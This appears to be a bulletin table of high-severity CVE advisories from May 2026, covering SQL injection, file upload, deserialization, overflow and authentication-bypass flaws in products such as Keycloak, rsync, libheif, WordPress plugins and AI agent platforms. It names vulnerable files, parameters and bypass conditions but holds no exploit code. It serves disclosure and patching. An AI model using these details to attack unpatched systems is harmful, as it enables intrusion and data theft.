| NousResearch--hermes-agent | A vulnerability was determined in NousResearch hermes-agent up to 5157f5427f19488b31c6fdebbacd15d798ce7f63. This affects the function detect_dangerous_command of the file tools/approval.py of the component terminal_tool. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9367 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This impacts the function execute_code of the file tools/code_execution_tool.py of the component Environment Variable Handler. Such manipulation leads to sandbox issue. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9368 |
| nukeviet--nukeviet | NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and attributes in user-submitted content, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite). An attacker can inject malicious payloads which are stored server-side and executed in the browser of any user who views the content. Anyone viewing user-submitted content (such as administrators and moderators reviewing contact messages or comments) is impacted, and the vulnerability can be exploited by any anonymous visitor without authentication, with the Contact module used only as a proof of concept. Potential consequences include session hijacking through cookie theft, unauthorized actions performed under the victim's identity, defacement or redirection to phishing pages, and phishing attacks via manipulated email notifications. This issue has been fixed in version 4.5.08. If developers are unable to upgrade immediately, they should work around this issue by implementing server-side HTML sanitization in the Request class to strip or encode dangerous tags and attributes (e.g., <iframe>, srcdoc, event handlers like onerror/onload), enforcing a Content Security Policy (CSP) to restrict inline script execution, and set cookies with the HttpOnly flag to mitigate cookie theft via XSS. | 2026-05-22 | 8.7 | CVE-2026-41147 |
| NVIDIA--BioNeMo Framework | NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 8.8 | CVE-2026-24217 |
| NVIDIA--BioNeMo Framework | NVIDIA BioNemo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 7.8 | CVE-2026-24216 |
| NVIDIA--DGX Spark | NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service. | 2026-05-20 | 8.1 | CVE-2026-24218 |
| NVIDIA--TensorRT | NVIDIA TensorRT contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to data tampering. | 2026-05-20 | 8.2 | CVE-2026-24188 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in MPI server, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2025-33255 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in RPC testing, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2026-24163 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure. | 2026-05-20 | 9.8 | CVE-2026-24207 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or information disclosure. | 2026-05-20 | 8 | CVE-2026-24213 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service. | 2026-05-20 | 8 | CVE-2026-24214 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to escalation of privileges, denial of service, or information disclosure. | 2026-05-20 | 7.3 | CVE-2026-24206 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24209 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24210 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables. | 2026-05-21 | 8.2 | CVE-2026-48235 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network. | 2026-05-21 | 8.1 | CVE-2026-48241 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations. | 2026-05-21 | 8.1 | CVE-2026-48242 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in tables.php where the multiple POST parameters (tablename, indexname, sortby) are concatenated into table/column identifiers in dynamically constructed SELECT/UPDATE/DELETE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48231 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/fullsit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48232 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48233 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in portal/ajax/list_requests.php where the sort and dir GET parameters are concatenated into the ORDER BY clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48234 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in db_loader.php where the multiple POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) are concatenated into mysqli connection arguments and dynamic SQL operating against an attacker-controlled database without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48236 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in message.php where the frm_ticket_id and frm_resp_id POST parameters are concatenated into WHERE clauses of SELECT/UPDATE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48237 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/mobile_main.php where the id GET parameter is concatenated into the WHERE clause of a SELECT statement used as a ticket-existence sanity check without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48238 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/reports.php where the tick_id POST parameter is concatenated into the WHERE clause of SELECT statements in the incidents summary report without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48239 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48240 |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.1 | CVE-2026-24792 |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS and it cannot be recovered. | 2026-05-19 | 8.4 | CVE-2026-25781 |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.8 | CVE-2026-27648 |
| OPPO--O+ Connect | A local privilege escalation vulnerability exists in O+ Connect because it fails to validate the identity of the caller on the pipe interface. | 2026-05-19 | 7.3 | CVE-2026-22069 |
| Piotnet--Piotnet Addons For Elementor Pro | The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4885 |
| Piotnet--Piotnet Forms | The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'piotnetforms_ajax_form_builder' function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4883 |
| PixelYourSite--Boost | The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2026-05-20 | 9.8 | CVE-2026-7637 |
| PixelYourSite--Boost | The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the 'current_url' and 'user_name' parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-9010 |
| pixelyoursite--Cost of Goods by PixelYourSite | The Cost of Goods by PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'csvdata[0][cost_of_goods_value]' parameter in versions up to, and including, 1.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 7.2 | CVE-2026-7613 |
| PosCube Hardware Software and Consulting Ltd.--QR Menu | Authorization bypass through User-Controlled key vulnerability in PosCube Hardware Software and Consulting Ltd. QR Menu allows Exploitation of Trusted Identifiers. This issue affects QR Menu: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.5 | CVE-2025-13479 |
| PowerDNS--Authoritative | Insufficient Validation of Autoprimary SOA Queries | 2026-05-21 | 7.5 | CVE-2026-42001 |
| projectworlds--hospital-management-system-in-php | A flaw has been found in projectworlds hospital-management-system-in-php 1.0. Affected by this vulnerability is the function getAllPatientDetail of the file update_info.php of the component GET Parameter Handler. Executing a manipulation of the argument appointment_no can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-18 | 7.3 | CVE-2026-8785 |
| projectworlds--Online Art Gallery Shop | A flaw has been found in projectworlds Online Art Gallery Shop 1.0. Impacted is an unknown function of the file /admin/adminHome.php. Executing a manipulation of the argument social_linked can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9364 |
| prosolution--ProSolution WP Client | The ProSolution WP Client plugin for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 2.0.0. This is due to an array validation mismatch where only the first file in the upload array undergoes extension and MIME type validation, while all files are processed and uploaded to a web-accessible directory. This makes it possible for unauthenticated attackers to upload malicious PHP files and achieve remote code execution by sending a valid first file followed by a malicious file. | 2026-05-20 | 9.8 | CVE-2026-6555 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak's URL validation logic during redirect operations. By crafting a malicious request, an attacker could bypass validation to redirect users to unauthorized URLs, potentially leading to the exposure of sensitive information within the domain or facilitating further attacks. This vulnerability specifically affects Keycloak clients configured with a wildcard (*) in the "Valid Redirect URIs" field and requires user interaction to be successfully exploited. The issue stems from a discrepancy in how Keycloak and the underlying Java URI implementation handle the user-info component of a URL. If a malicious redirect URL is constructed using multiple @ characters in the user-info section, Java's URI parser fails to extract the user-info, leaving only the raw authority field. Consequently, Keycloak's validation check fails to detect the malformed user-info, falls back to a wildcard comparison, and incorrectly permits the malicious redirect. | 2026-05-19 | 8.1 | CVE-2026-7504 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak. A remote, unauthenticated attacker can send a specially crafted XML input to the Security Assertion Markup Language (SAML) endpoint. This malicious input can cause high CPU usage and worker thread starvation, leading to a Denial of Service (DoS) where the server becomes unavailable. | 2026-05-19 | 7.5 | CVE-2026-7307 |
| Red Hat--Red Hat build of Keycloak 26.2 | A session fixation vulnerability was found in Keycloak's login-actions endpoints. An unauthenticated attacker could exploit this flaw by pre-creating an authentication session and tricking a victim into visiting a maliciously crafted link. By leveraging the /login-actions/restart endpoint-which processes session handles without adequate CSRF protection or cookie ownership validation-an attacker can reset the authentication flow state. This causes Single Sign-On (SSO) to authenticate the victim transparently upon clicking the link, allowing the attacker to hijack the required-action form without needing the victim's credentials. A successful exploit could lead to complete account takeover, including highly privileged administrative accounts. | 2026-05-19 | 7.5 | CVE-2026-7507 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege user, with knowledge of user credentials and client ID, can bypass a security control intended to disable the implicit flow in OpenID Connect (OIDC) clients. By manipulating client data during a session restart, an attacker can obtain an access token that should not be available. This vulnerability can also lead to the exposure of these access tokens in server logs, proxy logs, and HTTP Referrer headers, resulting in sensitive information disclosure. | 2026-05-19 | 7.1 | CVE-2026-7571 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389-ds-base. The get_ldapmessage_controls_ext() function in the LDAP server does not enforce an upper bound on the number of controls per LDAP message. A remote, unauthenticated attacker can send a specially crafted LDAP request containing hundreds of thousands of minimal controls within the default maximum BER message size (2 MB), causing excessive CPU consumption and heap allocation on the server. Under concurrent exploitation, this leads to significant latency degradation, worker thread starvation, or out-of-memory termination, resulting in a denial of service. | 2026-05-20 | 7.5 | CVE-2026-9064 |
| Red Hat--Red Hat Hardened Images | A flaw was found in gnutls. A remote attacker could exploit an issue in the Datagram Transport Layer Security (DTLS) packet reordering logic. The comparator function, responsible for ordering DTLS packets by sequence numbers, did not correctly handle packets with duplicate sequence numbers. This could lead to unstable packet ordering or undefined behavior, resulting in a denial of service. | 2026-05-18 | 7.5 | CVE-2026-42009 |
| Redaxo--Redaxo CMS Mediapool | Redaxo CMS Mediapool Addon 5.5.1 and older contains an arbitrary file upload vulnerability that allows authenticated users to bypass file extension blacklist restrictions. Attackers with editor accounts can upload executable files by using obfuscated extensions like php71 or php53 to evade the blacklist filter and execute arbitrary code. | 2026-05-23 | 8.8 | CVE-2018-25353 |
| Repute Infosystems--BookingPress Appointment Booking Pro | The BookingPress Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'bookingpress_validate_submitted_booking_form_func' function in all versions up to, and including, 5.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability can only be exploited if a signature custom field is added to the booking form. | 2026-05-21 | 9.8 | CVE-2026-6960 |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation. | 2026-05-20 | 8.1 | CVE-2026-43618 |
| RsyncProject--rsync | Rsync versions before 3.4.3 contain a time-of-check to time-of-use (TOCTOU) race condition in daemon file handling that allows attackers to redirect file writes outside intended directories by replacing parent directory components with symbolic links. Attackers with write access to a module path can exploit this race condition to create or overwrite arbitrary files, potentially modifying sensitive system files and achieving privilege escalation when the daemon runs with elevated privileges. This vulnerability can only be triggered if the chroot setting is false. | 2026-05-20 | 7 | CVE-2026-29518 |
| ruby-lang--Ruby | An issue was discovered in Ruby 4 before 4.0.5. A race condition leading to a use-after-free in the pthread-based getaddrinfo timeout handler (rb_getaddrinfo in ext/socket/raddrinfo.c) allows a remote attacker who can delay DNS responses near the user-specified timeout to crash a Ruby process that calls Addrinfo.getaddrinfo(..., timeout:) or Socket.tcp(..., resolv_timeout:). Memory-corruption-based exploitation is theoretically possible. The attack could, for example, be carried out through a crafted authoritative DNS server or recursive resolver. | 2026-05-22 | 8.1 | CVE-2026-46727 |
| Samsung Open Source--Escargot | Use after free vulnerability in Samsung Open Source Escargot allows Pointer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47310 |
| Samsung Open Source--Escargot | Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47311 |
| Samsung Open Source--Escargot | Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47314 |
| SigmaPlugin--Advanced Database Cleaner Premium | The Advanced Database Cleaner - Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-05-20 | 8.8 | CVE-2026-7522 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.6.36 through 0.6.50 are vulnerable to Authenticated Session Hijacking via IDOR. If an authenticated attacker can determine the session_id of another user's session, they can take it over, reading any messages in it and locking the legitimate user out. The PATCH /sessions/{session_id}/assign-user endpoint authenticates the caller but never verifies session ownership: the service layer invokes the session lookup with user_id=None, which the data access layer interprets as a privileged/system call that bypasses the ownership filter, allowing any authenticated user to reassign an arbitrary session to themselves. This issue has been patched in version 0.6.51. | 2026-05-18 | 7.1 | CVE-2026-30950 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.4.2 through 0.6.51 are vulnerable to an unauthenticated Denial of Service (DoS) through the server due to uncontrolled disk space consumption. The download_agent_file endpoint creates persistent temporary files for every request but fails to delete them after they are served. An unauthenticated attacker can repeatedly call this endpoint to exhaust the server's disk space, causing the database or other system services to fail due to "No space left on device" errors, rendering the entire AutoGPT Platform backend unavailable to all users. This issue has been patched in version 0.6.52. | 2026-05-19 | 7.5 | CVE-2026-33232 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(...) into Redis and the read path blindly invokes pickle.loads(...) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52. | 2026-05-19 | 7.6 | CVE-2026-33233 |
| Sipp--SIPp | SIPp 3.6 and earlier contains a local buffer overflow vulnerability in command-line argument handling that allows local attackers to crash the application or execute arbitrary code. Attackers can trigger the vulnerability by supplying oversized input to the -3pcc, -i, or -log_file parameters, causing strcpy to write beyond buffer boundaries in sipp.cpp. | 2026-05-23 | 8.4 | CVE-2018-25356 |
| Sitemio Information Technologies Trade Ltd. Co.--WISECP | Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery. This issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-20 | 8 | CVE-2025-11954 |
| SourceCodester--Hospitals Patient Records Management System | A flaw has been found in SourceCodester Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /classes/Master.php?f=save_patient_history. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9355 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability has been found in SourceCodester Hospitals Patient Records Management System 1.0. This affects an unknown function of the file /admin/patients/manage_history.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9356 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data. | 2026-05-20 | 7.5 | CVE-2026-20239 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.11, and 9.3.12, and Splunk Cloud Platform versions below 10.4.2603.1, 10.3.2512.9, 10.2.2510.11, 10.1.2507.21, 10.0.2503.13, and 9.3.2411.129, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could cause a Denial of Service by exploiting the `coldToFrozen.sh` script in the `splunk_archiver` app to rename critical Splunk directories, making the instance non-functional.<br><br>The Denial of Service is possible because of missing input validation in the `coldToFrozen.sh` script, which accepts arbitrary file paths and renames them without restricting operations to safe directories. | 2026-05-20 | 7.1 | CVE-2026-20240 |
| steipete--summarize | Summarize prior to 0.15.1 contains a path traversal vulnerability in the /v1/summarize daemon endpoint that allows authenticated callers to write files to arbitrary directories by supplying an absolute path or directory traversal sequence in the slidesDir request parameter. Attackers can exploit this to write slide_*.png and slides.json files to any writable directory and subsequently delete matching files at the specified location through repeat extraction. | 2026-05-18 | 7.1 | CVE-2026-45242 |
| steipete--summarize | Summarize prior to 0.15.1 contains a vulnerability in the hover summary feature that allows malicious pages to dispatch synthetic mouseover events over attacker-controlled links, causing the extension to make authenticated daemon requests using stored tokens without verifying event trustworthiness. Attackers can place local or private-network URLs behind hoverable links to route authenticated requests through the daemon, potentially accessing sensitive internal endpoints when users interact with attacker-controlled content. | 2026-05-18 | 7.4 | CVE-2026-45245 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap-buffer-overflow (write) vulnerability in the grid tile compositing, allowing an attacker to write 64 bytes of fully attacker-controlled data past the end of a chroma plane heap allocation by crafting a HEIF/AVIF file with a 1×4 grid of odd-height tiles. The overflow is triggered during normal image decoding with default build configuration. The written bytes are chroma (Cb/Cr) pixel values from the attacking tile, giving the attacker full control over the overflow content. This issue has been fixed in version 1.22.0. | 2026-05-19 | 8.8 | CVE-2026-32740 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and below contain a heap buffer overflow in MaskImageCodec::decode_mask_image(). When decoding a HEIF file containing a mask image (mski), the function copies the full iloc extent data into a pixel buffer using memcpy(dst, data.data(), data.size()). The copy length data.size() is determined by the iloc extent in the file (attacker-controlled), while the destination buffer is sized based on the declared image dimensions. Because no upper-bound check exists on the data length, a crafted file whose iloc extent exceeds the pixel buffer allocation overflows the heap. The vulnerable single-memcpy branch is reached when the mskC property specifies bits_per_pixel = 8 and the ispe property declares an even width ≥ 64 (so that stride == width), with no changes to default security limits or external codec plugins required. This issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32741 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap buffer over-read in HeifPixelImage::overlay() in libheif/pixelimage.cc. When compositing an overlay image (iovl) whose child image has a different bit depth for the alpha channel than for the color channels, the function indexes into the alpha plane using the color channel stride (in_stride) instead of the previously retrieved alpha_stride, causing reads past the end of the alpha buffer (up to 3,123 bytes for a 100×50 image with 10-bit color and 8-bit alpha). A crafted HEIF file can exploit this to cause a denial of service (crash) or potentially disclose adjacent heap memory through leaked bytes embedded in the decoded output pixels. This issue has been fixed in versionThis issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32882 |
| SUSE--Container suse/sle-micro-rancher/5.3:latest | In `src/havegecmd.c`, the `socket_handler` function performs a credential check on the abstract UNIX socket (`\0/sys/entropy/haveged`). However, while it detects if the connecting user is not root (`cred.uid != 0`) and prepares a negative acknowledgement (`ASCII_NAK`), it **fails to stop execution**. The code proceeds to the `switch` statement, allowing any local unprivileged user to execute privileged commands such as `MAGIC_CHROOT`. | 2026-05-20 | 7.8 | CVE-2026-41054 |
| SUSE--SUSE Linux Enterprise | `PluginScript` attempts to `chroot` the plugin to the `repoManagerRoot`, this root is frequently `/` (the system root) in standard configurations or when using `--root`. If the chroot target is `/`, it is a no-op, allowing the traversed path to execute host binaries (like `/bin/bash`) with root privileges. | 2026-05-20 | 7.8 | CVE-2026-44933 |
| syslink software AG--Avantra | Insufficient session expiration vulnerability in syslink software AG Avantra on Linux, Windows allows Reusing Session IDs (aka Session Replay). This issue affects Avantra: before 25.3.1. | 2026-05-22 | 9.6 | CVE-2026-8670 |
| syslink software AG--Avantra | Insertion of sensitive information into log file vulnerability in syslink software AG Avantra on Linux, Windows allows Resource Leak Exposure. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 7.5 | CVE-2026-8671 |
| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a hard-coded credential vulnerability in the embedded web configuration interface where authentication is implemented entirely in client-side JavaScript in login.zhtml, exposing static plaintext credentials in the page source. Unauthenticated attackers with network access can recover administrative credentials directly from the client-side validate() function to obtain full administrative access to the device. | 2026-05-20 | 9.8 | CVE-2026-9139 |
| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains an authentication bypass vulnerability in the embedded web configuration interface that allows unauthenticated attackers to access internal application pages without any session management or server-side authentication checks. Attackers with network access can directly request internal resources such as index.zhtml, point.zhtml, and log.shtml to gain full administrative read and write access, enabling unauthorized modification of alarm routing, device configuration, and disruption of monitoring and control functions. | 2026-05-20 | 9.8 | CVE-2026-9141 |
| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a stored cross-site scripting vulnerability in the embedded web configuration interface that allows authenticated attackers to execute persistent JavaScript by fragmenting malicious payloads across multiple administrative form fields. Attackers can bypass front-end length restrictions using JavaScript comments and template literals to concatenate executable script fragments that are rendered in administrative dashboard views such as index.zhtml, resulting in persistent script execution within administrative sessions. | 2026-05-20 | 7.6 | CVE-2026-9144 |
| Talend--Talend Administration Center | A broken access control issue has been identified in the Talend Administration Center, that allows a user with "View" permission to modify the Talend Studio update URL. This issue was resolved in a patch, which is already available. | 2026-05-20 | 8.2 | CVE-2026-9057 |
| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the webhook_url parameter in the file scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/local/file/scan) when running in server mode. An unauthenticated remote attacker can supply an arbitrary URL as the webhook_url multipart form parameter. After scanning the uploaded file, Terrascan sends an HTTP POST request to the attacker-controlled URL containing the full scan results as a JSON body, with the attacker-supplied webhook_token forwarded as a Bearer token in the Authorization header. The retryable HTTP client retries up to 10 times on failure. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47356 |
